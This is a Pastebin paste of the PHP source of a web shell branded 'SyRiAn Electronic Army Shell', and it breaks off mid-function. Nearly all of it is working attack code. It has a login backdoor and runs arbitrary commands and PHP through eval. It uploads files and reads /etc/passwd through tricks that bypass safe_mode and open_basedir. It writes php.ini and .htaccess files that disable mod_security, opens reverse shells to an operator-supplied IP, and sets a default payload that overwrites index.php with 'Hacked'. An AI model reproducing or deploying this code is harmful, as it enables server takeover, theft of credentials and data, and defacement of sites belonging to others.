Googleinurl

[SHELL_SCRIPT]=> SyRiAn Electronic Army Shell :: SEA Shell

Aug 26th, 2014
1,130
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. # Bypass SuHosin
  3. # Virtual
  4. # users 6 ID /etc/passwd
  5.  
  6. $user = 'mhu';
  7. $pass = 'mhu';
  8. $uselogin = 1;
  9. $sh3llColor = "green";
  10.  
  11. # MySQL Info ---------
  12. $DBhost = "localhost";
  13. $DBuser = "root";
  14. $DBpass = "root";
  15. #---------------------
  16. session_start();
  17. error_reporting(0);
  18. set_magic_quotes_runtime(0);
  19. set_time_limit(0);
  20. ignore_user_abort(TRUE);
  21. ini_restore("safe_mode");
  22. ini_restore("open_basedir");
  23. ini_set('max_execution_time',0);
  24. ini_set('output_buffering',0);
  25. ini_set('safe_mode','Off');
  26.  
  27. // Set Current Directory
  28. if(!$_POST && !$_SESSION['curDir']) {
  29.     $dir = getcwd();
  30.     $_SESSION['curDir'] = $dir;
  31. } else if(empty($_POST['curDir'])) {
  32.     $dir = $_SESSION['curDir'];
  33. } else {
  34.     $dir = filter($_POST['curDir']);
  35.     $_SESSION['curDir'] = $dir;
  36. }
  37. // Set Dir Mode
  38. if($_GET['dir_mode']) {
  39.     $dir_mode = $_GET['dir_mode'];
  40.     $_SESSION['dir_mode'] = $dir_mode;
  41. } else {
  42.     $dir_mode = $_SESSION['dir_mode'];
  43. }
  44.  
  45. // Set Usable Command
  46. if($_POST['exe_method']) {
  47.     $exec_method = $_POST['exe_method'];
  48. } else {
  49.     $exec_method = "exec";
  50. }
  51. # Logout
  52. if($_POST['logout']) {
  53.     print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
  54.     print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
  55. }
  56. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
  57. if($_GET['info']){phpinfo();}
  58. $safeMode = SafeMode();
  59. $server = substr($SERVER_SOFTWARE,0,120);
  60. $daemon = "";
  61. ?>
  62. <html>
  63. <head>
  64. <title>SyRiAn Electronic Army Shell :: SEA Shell</title>
  65. <link rel="shortcut icon" href='http://i40.tinypic.com/2rpuped.png' />
  66. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
  67. <?php echo CSS($sh3llColor); ?>
  68.  
  69. </head>
  70. <body dir='ltr'>
  71. <?php
  72. # ---------------------------------------#
  73. #             Authentication             #
  74. #----------------------------------------#
  75. if ($uselogin ==1) {
  76.     if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
  77.         if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
  78.         if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
  79.             print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
  80.         } else {
  81.             if($_POST['usrname']){
  82.                 print'<script>alert("Go and play in the street man !!");</script>';
  83.             }
  84. ?>
  85. <br><br>
  86.             <center><img src="http://i40.tinypic.com/2rpuped.png"><br />
  87.             <sy>SyRiAn Electronic Army</sy>
  88.             </center><br />
  89.             <div align="center">
  90.                 <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
  91.                 <input dir="ltr" name="usrname" id="username" value="" type="text"  size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
  92.                 <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
  93.                 <input type="submit" value=" Login  " name="login" />
  94.                 </form>
  95.             </div>
  96.             <?php
  97.             footer();
  98.             exit;
  99.         }
  100.     }
  101. }
  102. ?>
  103. <table cellpadding='0' cellspacing='0' width='100%'>
  104.     <tr>
  105.         <td width='160'>
  106.         <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
  107.             <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://i40.tinypic.com/2rpuped.png' width='100%' height='100%'></a><br>
  108.             <center>SyRiAn Electronic Army
  109.             <p></p>
  110.                 <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
  111.                     <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
  112.                     <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
  113.                 </select>
  114.             </center>
  115.       </td>
  116.       <td>
  117.       <form method="post">
  118. <table width='100%' style="border:none; padding:2px;" >
  119.     <tr>
  120.         <td width='103'>System</td>
  121.         <td width="323"><?php echo $os; ?></td>
  122.         <td width="90">Apache Modules</td>
  123.         <td width="278"><select ><?php
  124.         if(function_exists("apache_get_modules")) {
  125.             foreach (apache_get_modules() as $module) {
  126.                 echo "<option>".$module."</option>";
  127.             }
  128.         }else {
  129.             echo "<option>NONE</option>";
  130.         }
  131.         ?></select></td>
  132.     </tr>
  133.     <tr>
  134.       <td>uname </td>
  135.       <td><a href='http://www.google.com/search?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
  136.       <td>Curl</td>
  137.       <td><?php echo Curl(); ?></td>
  138.     </tr>
  139.     <tr>
  140.         <td>pwd</td>
  141.         <td><?php echo getcwd(); ?></td>
  142.         <td>Open Basedir</td>
  143.         <td><?php echo openBaseDir(); ?></td>
  144.     </tr>
  145.     <tr>
  146.         <td>whoami</td>
  147.         <td><?php echo get_current_user(); ?></td>
  148.         <td>Magic_Quotes</td>
  149.         <td><?php echo magicQouts(); ?></td>
  150.     </tr>
  151.         <tr>
  152.           <td>Server</td>
  153.           <td><?php echo $server; ?></td>
  154.           <td>Register Globals</td>
  155.           <td><?php echo RegisterGlobals(); ?></td>
  156.         </tr>
  157.         <tr>
  158.           <td>Server Name</td>
  159.           <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
  160.           <td>Gzip</td>
  161.           <td><?php echo Gzip(); ?></td>
  162.         </tr>
  163.         <tr>
  164.           <td>Your IP</td>
  165.           <td><?php echo GetRealIP(); ?></td>
  166.           <td>Oracle</td>
  167.           <td><?php echo Oracle(); ?></td>
  168.         </tr>
  169.         <tr>
  170.           <td>Server IP</td>
  171.           <td><a href='http://bing.com/search?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
  172.           <td>MSQL</td>
  173.           <td><?php echo MSQL(); ?></td>
  174.         </tr>
  175.         <tr>
  176.           <td>PHP Version</td>
  177.           <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
  178.           <td>MySQL</td>
  179.           <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
  180.         </tr>
  181.         <tr>
  182.           <td>Safe Mode</td>
  183.           <td><?php echo $safeMode; ?></td>
  184.           <td>MySQLi</td>
  185.           <td><?php echo MysqlI(); ?></td>
  186.         </tr>
  187.         <tr>
  188.         <td>disable functions</td>
  189.         <td><select name="disableFunctions"><?php
  190.         $funArray = DisableFunctions();
  191.         $funArray = explode(",",$funArray);
  192.         sort($funArray);
  193.         foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
  194.         ?></select>
  195.           <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
  196.           </td>
  197.         <td>MsSQL</td>
  198.         <td><?php echo MsSQL(); ?></td>
  199.         </tr>
  200. </table>
  201. &nbsp;   [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
  202. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
  203. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
  204. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
  205. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
  206. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
  207. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
  208. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
  209. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
  210. <input type="submit" name="find_755" id="find_755" value="Find 755" />
  211. <br>
  212. </form>
  213. </table>
  214.  
  215. <form method="post">
  216. <center>
  217. <textarea cols="150" rows="20" name="result" >
  218. <?php
  219. chdir($dir);
  220. if($_POST['login'] || !$_POST){echo ScanDirs();}
  221. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
  222. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
  223. else if($_POST['UPLOAD_Execute']) {
  224.     for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
  225.         if($_FILES['uploadfile']['name'][$i] != '') {
  226.             if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  227.             else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  228.             if($upload) {echo "The File  ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
  229. ";  }
  230.             else { echo "The File  ".$_FILES['uploadfile']['name'][$i]."  Can't Be Upload :( !
  231. ";}
  232.         }
  233.     }      
  234. }
  235. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
  236. else if($_POST['SAVE_Execute']) {
  237.     $content = filter($_POST['result']);
  238.     if(empty($content)){$content = " ";}
  239.     if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
  240. }
  241. else if($_POST['READ_Execute']) {
  242.     $path = urldecode(filter($_POST['READ_Line']));
  243.     $file = fopen($path,'r+');
  244.     if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path)));  }
  245.     else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
  246.     else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
  247.     else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
  248.     else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
  249.     else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
  250.     else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
  251.     else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
  252.     else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
  253.     else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
  254.     else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
  255.     else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
  256.     else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
  257.     else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
  258.     else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
  259.     else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
  260.     else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
  261.     else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
  262.     else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
  263.     else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
  264. }
  265. else if($_POST['STOP_Execute']) {
  266. $genTry = GenerateFile("php.ini","
  267. safe_mode = Off
  268. disable_functions = NONE
  269. safe_mode_gid = OFF
  270. open_basedir = OFF");
  271.     if($genTry){echo "[+] php.ini Has Been Generated Successfully
  272. ";}
  273.     else {echo "[-] Failed to generate php.ini file !!
  274. ";}
  275.    
  276.     $genTry = GenerateFile(".htaccess","
  277. <IfModule mod_security.c>
  278. SecFilterEngine Off
  279. SecFilterScanPOST Off
  280. SecFilterCheckURLEncoding Off
  281. SecFilterCheckCookieFormat Off
  282. SecFilterCheckUnicodeEncoding Off
  283. SecFilterNormalizeCookies Off
  284. </IfModule>
  285. <Limit GET POST>
  286. order deny,allow
  287. deny from all
  288. allow from all
  289. </Limit>
  290. <Limit PUT DELETE>
  291. order deny,allow
  292. deny from all
  293. </Limit>
  294. SetEnv PHPRC ".getcwd()."/php.ini
  295.     ");
  296.     if($genTry){echo "[+] .htaccess Has Been Generated Successfully
  297. ";}
  298.     else {echo "[-] Failed to generate .htaccess file !!
  299. ";}
  300. }
  301. else if($_POST['CON_Type'] == "socks") {
  302.     $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  303.     if($sock < 0){echo "[-] failed to create socket.";}
  304.     else {
  305.         $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
  306.         if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
  307.         else {
  308.             $send_var = "\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$";
  309.             socket_write($sock, $send_var, strlen($send_var));
  310.             while($input = socket_read($sock, 10000)) {
  311.                 socket_write($sock, shell_exec($input), 12000);
  312.             }
  313.         }
  314.     }
  315. } else if($_POST['CON_Type'] == "fsockopen") {
  316.     $ip = filter(trim($_POST['ip']));
  317.     $port = filter(trim($_POST['port']));
  318.     if (!empty($ip)) {
  319.         $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
  320.         if (!$con_fsockopen){
  321.             $result = "Error: didnt connect !!!";
  322.         } else {
  323.             $newLine="\n";          
  324.             fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
  325.             fputs($con_fsockopen , system("uname -a") .$newLine );
  326.             fputs($con_fsockopen , system("pwd") .$newLine );
  327.             fputs($con_fsockopen , system("id") .$newLine.$newLine );
  328.             while(!feof($con_fsockopen)){  
  329.                 fputs ($con_fsockopen);
  330.                 $one="[$";
  331.                 $two="]";
  332.                 $result= fgets ($con_fsockopen, 8192);
  333.                 $message = $result;
  334.                 fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
  335.             }
  336.             fclose ($con_fsockopen);
  337.         }
  338.     }
  339. }
  340. else if($_POST['USERS_1']){echo GetUsers1();}
  341. else if($_POST['USERS_2']) {
  342.      $array = GetUsers2();
  343.      foreach($array as $line)
  344.      {echo $line."
  345. ";}
  346. }
  347. else if($_POST['USERS_3']) {
  348.      $array = GetUsers3();
  349.      foreach($array as $line)
  350.      {echo $line."
  351. ";}
  352. }
  353. else if($_POST['USERS_4']) {
  354.      $array = GetUsers4();
  355.      foreach($array as $line)
  356.      {echo $line."
  357. ";}
  358. } else if($_POST['USERS_5']){echo GetUsers5();}
  359. else if($_POST['forbidden_bypass']) {
  360.     mkdir("forbidden");
  361.     chdir("forbidden");
  362.     $forbidden_htaccess = GenerateFile(".htaccess", "
  363. DirectoryIndex sea.txt
  364. HeaderName sea.txt
  365. ReadmeName sea.txt
  366. footerName sea.txt
  367. ErrorDocument 404 /404.html
  368. 404.html = Symlinked sea.txt
  369. Options all
  370. ForceType text/plain
  371. AddType text/plain .php
  372. AddType text/plain .html
  373. AddHandler server-parsed .php
  374. AddHandler txt .php
  375.     ");
  376.     if($forbidden_htaccess) {
  377.         echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
  378.     } else {
  379.         echo "[-] error with generating .htaccess file.";
  380.     }
  381. } else if($_POST['find_755']) {
  382.     Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
  383. }
  384. ?></textarea>
  385. <?php
  386. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
  387. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
  388. ";}
  389. ?>
  390. </center></form>
  391. <table width='100%'>
  392.     <tr valign="top">
  393.         <td width='30%'>
  394.        <!-- Command Line -->
  395.        <form method='POST' enctype="multipart/form-data">
  396.             <table height='72' border='0' id='Box' width="100%">
  397.               <tr>
  398.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  399.                     <td style="background-color:#666;padding-left:10px;">Edit File
  400.                     <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
  401.               </tr>
  402.                 <tr>
  403.                   <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
  404.                 </tr>
  405.             </table>
  406.         </form>
  407.         <!-- End Of Command Line-->
  408.        
  409.         </td>
  410.         <td width='30%' height='30'>
  411.          <!-- Command Line -->
  412.          <form method='POST' enctype="multipart/form-data">
  413.               <table height='72' border='0' id='Box'>
  414.               <tr>
  415.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  416.                 <td style="background-color:#666;padding-left:10px;">Command Line
  417.                 <?php echo print_exe_method(); ?>
  418.                 <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
  419.                 </td>
  420.             </tr>
  421.                 <tr>
  422.                   <td height="45" colspan="2">
  423.                     <?php echo SelectCommand($os); ?>
  424.                     <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
  425.                   <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
  426.                 </tr>
  427.             </table>
  428.         </form>
  429.         <!-- End Of Command Line-->
  430.       </td>
  431.         <td width='30%' height='30' valign="top">
  432.         <!-- Commands Alias-->
  433.         <form method='POST' enctype="multipart/form-data">
  434.             <table width='100%' height='72' border='0' id='Box'>
  435.               <tr>
  436.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  437.                     <td style="background-color:#666;padding-left:10px;">Upload Files             <span style="padding-left:10px;">
  438.                       <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
  439.                     <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
  440.                     </span></td>
  441.               </tr>
  442.                 <tr>
  443.                   <td height="45" colspan="2">
  444.                   <input type='file' name='uploadfile[]'>
  445.                   <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
  446.                 </tr>
  447.             </table>
  448.         </form>
  449.         <!-- End Of Commands Alias-->
  450.         </td>
  451.     </tr>
  452. <tr valign="top">
  453.         <td width='30%'>
  454.        <!-- Commands Alias-->
  455.        <form method='POST' enctype="multipart/form-data">
  456.             <table width='100%' height='72' border='0' id='Box'>
  457.               <tr>
  458.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  459.                     <td style="background-color:#666;padding-left:10px;">PHP Eval                
  460.                     <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
  461.               </tr>
  462.                 <tr>
  463.                   <td height="45" colspan="2"><label for="PHP_Line"></label>
  464.                   <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
  465.     fwrite($file,"Hacked");
  466.     fclose($file);';}
  467.                 ?>
  468.                   </textarea>
  469.                   <br></td>
  470.               </tr>
  471.             </table>
  472.         </form>
  473.         <!-- End Of Commands Alias-->
  474.         </td>
  475.         <td width='30%' height='30'>
  476.         <!-- Commands Alias-->
  477.         <form method='POST' enctype="multipart/form-data">
  478.         <table width='100%' height='72' border='0' id='Box'>
  479.           <tr>
  480.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  481.                 <td style="background-color:#666;padding-left:10px;">Read Files
  482.                  
  483.                   <select name="READ_Type" >
  484.                     <option value="file" >file</option>
  485.                     <option value="fgets" >fgets</option>
  486.                     <option value="fgetss" >fgetss</option>
  487.                     <option value="readfile" >readfile</option>
  488.                     <option value="fread" >fread</option>
  489.                     <option value="show_source" >show_source</option>
  490.                     <option value="file_get_contents" >file_get_contents</option>
  491.                     <option value="tempnam" >tempnam</option>
  492.                     <option value="copy" >copy</option>
  493.                     <option value="symlink" >Symlink</option>
  494.                     <option value="mb_send_mail" >mb_send_mail</option>
  495.                     <option value="highlight_file" >highlight_file</option>
  496.                     <option value="curl" >Curl</option>
  497.                     <option value="imap" >Imap</option>
  498.                     <option value="mysql" >MySQL</option>
  499.                     <option value="mysqli" >MySQLI</option>
  500.                     <option value="ioncube">Ion Cube</option>
  501.                     <option value="error_log">Error_Log</option>
  502.                     <option value="include">Include</option>
  503.                     <option value="id" >ID /etc/passwd</option>
  504.                   </select>
  505.                   <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
  506.           </tr>
  507.             <tr>
  508.               <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
  509.           </tr>
  510.         </table>
  511.         </form>
  512.         <!-- End Of Commands Alias-->
  513.   </td>
  514.         <td width='30%' height='30' valign="top">
  515.         <!-- Commands Alias-->
  516.         <form method='POST' enctype="multipart/form-data">
  517.         <table width='100%' height='72' border='0' id='Box'>
  518.           <tr>
  519.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  520.                 <td style="background-color:#666;padding-left:10px;">Back Connection
  521.                 <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
  522.           </tr>
  523.             <tr>
  524.               <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
  525.               <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
  526.               <select name="CON_Type" >
  527.                 <option value="socks">SOCKS</option>
  528.                 <option value="fsockopen">FSOCKOPEN</option>
  529.               </select>
  530.               </td>
  531.             </tr>
  532.         </table>
  533.         </form>
  534.         <!-- End Of Commands Alias-->
  535.         </td>
  536.     </tr>
  537. </table>
  538. <?php
  539. function IncludeReader($path) {
  540.     global $os;
  541.     if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
  542.     $fileName = substr(strrchr($path,$slash),1);
  543.     $includePath = substr($path,0,strpos($path,$fileName,0));
  544.     ini_set("include_path",$includePath);
  545.     include($fileName);
  546. }
  547. function GetUsers1() {
  548.     return Exe('ls /var/mail');
  549. }
  550. function GetUsers2() {
  551.     $array = array();
  552.     $lines = file("/etc/passwd");
  553.     foreach($lines as $nr=>$val) {
  554.         $str = explode(":",$val);
  555.         array_push($array,$str[0]);
  556.     }
  557.     return $array;
  558. }
  559. function GetUsers3() {
  560.     $array = array();
  561.     if ($dh = opendir("/home/"))  {
  562.         while (($file = readdir($dh)) !== false)  {
  563.             array_push($array,$file);
  564.         }
  565.         closedir($dh);
  566.         return $array;
  567.     }
  568. }
  569. function GetUsers4() {
  570.     $dir = "/home/";
  571.     $array = array();
  572.      if ($dh = opendir($dir)) {
  573.         $f = readdir($dh);
  574.         while (($f = readdir($dh)) !== false) {
  575.             $dh2=opendir($dir."/");
  576.             $f2 = readdir($dh2);
  577.             while (($f2 = readdir($dh2)) !== false) {
  578.                 $f2.="/";
  579.                 $dh3=opendir($dir.$f.$f2);
  580.                 $f3 = readdir($dh3);
  581.                 while (($f3 = readdir($dh3)) !== false) {
  582.                     array_push($array,$f3);
  583.                 }
  584.             }
  585.         }
  586.         closedir($dh);
  587.         return $array;
  588.      } 
  589. }
  590. function GetUsers5(){
  591.     return realpath('/etc/passwd');
  592. }
  593. function ErrorLog($path){
  594.     $tempFile = uniqid();
  595.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  596.     error_log(file_get_contents($path), 3, $tempFile);
  597.     $content = file_get_contents($tempFile);
  598.     unlink($tempFile);
  599.     return $content;   
  600. }
  601. function SymlinkF($path) {
  602.     $tempFile = uniqid();
  603.     if(function_exists('symlink')) {
  604.         symlink($path,$tempFile);
  605.         $content = file_get_contents($tempFile);
  606.         unlink($tempFile);
  607.         return $content;
  608.     }
  609. }
  610. function MySQLReader($path) {
  611.     global $DBhost,$DBuser,$DBpass;
  612.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  613.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
  614.     mysql_query("CREATE DATABASE a");
  615.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
  616.     mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
  617.     mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
  618.     $result = mysql_query("SELECT a FROM a.a");
  619.     while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
  620.     mysql_query("DROP DATABASE a");
  621. }
  622. function MySQLIReader($path) {
  623.     global $DBhost,$DBuser,$DBpass;
  624.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  625.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
  626.     mysql_query("CREATE DATABASE a");
  627.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
  628.    
  629.     function r($fp, &$buf, $len, &$err) {
  630.       print fread($fp, $len);
  631.     }
  632.     $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
  633.     $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
  634.     $m->set_local_infile_handler("r");
  635.     $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
  636.     $m->close();
  637. }
  638. function DBConnect($host,$user,$pass,$db) {
  639.     $connect = mysql_pconnect($host,$user,$pass);
  640.     if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false;  }
  641.     else {
  642.         $tryToSelectDB = mysql_select_db($db,$connect);
  643.         if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false;      }
  644.         else{return true; return $connect;}
  645.     }
  646. }
  647. function ReadId($path) {
  648.     for($uid=0;$uid<60000;$uid++) {  
  649.         $ara = posix_getpwuid($uid);
  650.         if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
  651.         }
  652.     }
  653.     return $content;
  654. }
  655. function ImapF($path) {
  656.     $stream = imap_open($path, "", "");
  657.     $str = imap_body($stream, 1);
  658.     imap_close($stream);
  659.     return $str;
  660. }
  661. function FileF($path) {
  662.     $lines = file($path); foreach($lines as $line){$content .= $line;}
  663.     return $content;
  664. }
  665. function CopyF($path) {
  666.     $tempFile = md5(uniqid()).".bb";
  667.     copy($path,$tempFile);
  668.     $content = file_get_contents($tempFile);
  669.     unlink($tempFile);
  670.     return $content;
  671. }
  672. function fgetssF($path) {
  673.     while(($line = fgetss($path)) != false){$content .= $line;}
  674.     return $content;
  675. }
  676. function highlightFile($path) {
  677.     return highlight_file($path);
  678. }
  679. function mbSendEmail($path) {
  680.     if(function_exists('mb_send_mail')) {
  681.         $tempFile = uniqid();
  682.         $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
  683.         mb_send_mail("email@example.com", NULL, NULL, NULL, $additional_param);
  684.         $content = file_get_contents($tempFile);
  685.         unlink($tempFile);
  686.         return $content;
  687.     }
  688. }
  689. function DeleteFile($fileName) {
  690.     global $os;
  691.     if(function_exists('unlink'))
  692.     {$delete = unlink($fileName);}
  693.     if((!$delete) && ($os == 'Windows'))
  694.     {$delete = Exe("del $fileName"); }
  695.     else if((!$delete) && ($os == 'Linux'))
  696.     {$delete = Exe("rm -f $fileName");}
  697.     if($delete){return true;}else{return false;}
  698. }
  699. function CurlFileRead($path) {
  700.     $ch = curl_init("file://".$path."\x00".__FILE__);
  701.     var_dump(curl_exec($ch));
  702. }
  703. function FReadF($path) {
  704.     $file = fopen($path,'r+'); //Open The File
  705.     if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
  706.     fclose($file);
  707. }
  708. function TempnameF($path) {
  709.     global $dir;
  710.     $temp = tempnam($dir, "cx");
  711.     if(copy("compress.zlib://".$path, $temp)) {
  712.         $handler = fopen($temp, "r");
  713.         $readFile = fread($handler, @filesize($temp));
  714.         fclose($handler);
  715.         $content .= htmlspecialchars($filename);
  716.         $content .= nl2br(htmlspecialchars($readFile));
  717.         $content .= htmlspecialchars($filename);
  718.         unlink($temp);
  719.         return $content;
  720.     }  
  721. }
  722. function Evaluation($eval) {
  723.     $eval = str_replace(array("<?php","<?","?>"),"",$eval);
  724.     $eval = eval($eval);
  725.     if($eval){return true;}else{return false;}
  726. }
  727. function Oracle() {
  728.     if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
  729.     else {$oracle = '<font color="green">OFF</font>';}return $oracle;
  730. }
  731. function MsSQL() {
